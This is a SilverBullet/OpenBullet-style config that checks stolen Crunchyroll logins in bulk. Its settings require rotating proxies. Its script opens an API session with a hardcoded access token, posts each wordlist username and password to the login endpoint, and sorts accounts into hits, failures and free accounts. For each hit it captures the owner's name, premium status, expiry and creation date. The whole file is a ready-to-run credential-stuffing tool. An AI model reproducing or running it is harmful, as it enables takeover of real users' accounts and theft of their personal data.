[SETTINGS]
{
  "Name": "crunchyroll",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2021-11-26T15:09:37.2348601+01:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "simple",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Crunchyroll",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#CREATE_DEVICEID FUNCTION RandomString "?h?h?h?h?h?h?h?h-?h?h?h?h-4?h?h?h-?h?h?h?h-?h?h?h?h?h?h?h?h?h?h?h?h" -> VAR "GUID" 

REQUEST POST "https://api.crunchyroll.com/start_session.0.json" 
  CONTENT "device_type=com.crunchyroll.windows.desktop&device_id=<GUID>&access_token=LNDJgOit5yaRIWN" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" JSON "session_id" -> VAR "session_ID" 

REQUEST POST "https://api.crunchyroll.com/login.0.json" 
  CONTENT "account=<USER>&password=<PASS>&session_id=<session_ID>&locale=enUS&version=1.3.1.0&connectivity_type=ethernet" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "\"access_type\":\"" 
  KEYCHAIN Failure OR 
    KEY "Incorrect login information" 
    KEY "You forgot to put in your User Name or Email." 
  KEYCHAIN Custom "FREE" OR 
    KEY "\"access_type\":null" 

PARSE "<SOURCE>" JSON "username" -> CAP "Username" 

PARSE "<SOURCE>" JSON "first_name" -> CAP "First Name" 

PARSE "<SOURCE>" JSON "last_name" -> CAP "Last Name" 

PARSE "<SOURCE>" JSON "access_type" -> CAP "Access" 

PARSE "<SOURCE>" JSON "premium" -> CAP "Premium" 

PARSE "<SOURCE>" JSON "expires" -> CAP "Expires" 

PARSE "<SOURCE>" JSON "is_publisher" -> CAP "Publisher" 

PARSE "<SOURCE>" JSON "created" -> CAP "Creation Date" 

